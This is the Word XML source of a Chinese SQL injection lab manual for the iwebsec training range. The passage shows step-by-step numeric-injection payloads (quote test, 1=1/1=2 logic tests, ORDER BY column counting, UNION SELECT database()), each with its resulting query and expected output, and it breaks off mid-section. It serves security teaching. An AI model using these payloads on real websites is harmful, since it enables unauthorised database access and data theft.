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322F9" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="480" w:after="480" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>iwebsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>注入实战手册（数字型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>字符型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D87AA73" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="heading_0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>前言</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="589CDB7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本手册专为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iwebsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>靶场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注入实战设计，整合数字型、字符型注入全流程，包含注入点判断、列数猜解、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>注入完整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及原理分析，适用于信息安全入门学习、实验教学及靶场通关练习。所有操作仅用于合法靶场测试，严禁用于未授权系统，违反相关法律法规需自行承担责任。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B090E98" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="heading_1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>一、基础环境说明</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="3F1B840F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靶场地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>http://192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>X.X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/sqli/01.php?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397A6DF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页面结构：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>正常访问</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>时，返回表格数据，包含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列（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>id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name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age</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），用于展示注入结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3116251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核心说明：本手册同时覆盖两种最常见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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数字型（靶场默认漏洞类型）、字符型（模拟单引号包裹场景），全程包含测试语句、拼接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、预期结果、原理分析，可直接对照操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7093DCC4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工具要求：无需额外工具，直接通过浏览器地址栏输入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即可完成测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F2265E" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="heading_2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>二、数字型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>注入完整流程（靶场默认类型）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="063F908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核心特征：参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>为数字类型，后端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语句中无引号包裹，直接拼接用户输入，语法格式为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$id LIMIT 0,1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D202C6A" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="heading_3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>第一步：注入点判断（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>种核心测试方法）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="004A6507" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282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单引号测试（判断包裹类型）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0292A2A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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>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?id=1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4183CB9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1' LIMIT 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18647B12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预期结果：页面报错（提示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语法错误，含单引号相关报错）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F70452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原理：单引号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>破坏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语法结构，数据库解析时无法识别多余的单引号，报</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>错说明</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>参数未被引号包裹，确定为数字型注入。若不报错，可能是字符型注入或输入被转义。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A92A48" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="heading_5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2. and 1=1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>恒真测试</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>（判断是否可拼接逻辑）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="0908DFF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 and 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B80E0B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 1 and 1=1 LIMIT 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78013343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预期结果：页面正常显示数据，与原页面（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）显示内容一致</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FD1ED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and 1=1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是永真条件</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，拼接后整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>子句仍为真（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），不影响原查询结果；页面正常返回，说明用户输入可直接拼接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逻辑，存在注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8BA4CA" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="heading_6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3. and 1=2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>恒假测试</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>（验证注入可控）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="1F13BBB0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 and 1=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EDC2A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1 and 1=2 LIMIT 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7182B37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预期结果：页面无数据返回、空白或报错（无匹配记录）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2BC08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and 1=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是永假条件，拼接后整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>子句为假（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），无符合条件的记录；页面从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有数据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变为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无数据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，证明用户可完全控制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查询逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401E84D5" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="heading_7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4. order by 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>列数猜解（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>注入前提）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="35EC80D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 order by 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F50DE13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1 order by 4 LIMIT 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B434A55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预期结果：页面报错（提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>“Unknown column '4'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in 'order clause'”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19087157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order by N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>表示按查询结果的第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>列排序，若</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>超过实际列数则报错；结合前置测试（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>order by 1/2/3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>均正常），可确定查询结果共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列，这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>注入的强制前提（前后查询列数必须一致）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C67E89F" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="heading_8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>第二步：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>注入完整</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>（获取敏感数据）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="5D62A77C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核心逻辑：用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>id=-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>让原查询无结果，确保</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>查询结果被页面回显；严格按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列结构编写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，匹配列数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260E9209" w14:textId="77777777" w:rsidR="005D0D0E" w:rsidRDefault="00E96282">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="heading_9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获取当前数据库名</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="6F97D51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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>,database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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE5256C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-1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2,database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() LIMIT 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1605A6F2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预期结果：页面回显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列数据，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>列显示</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
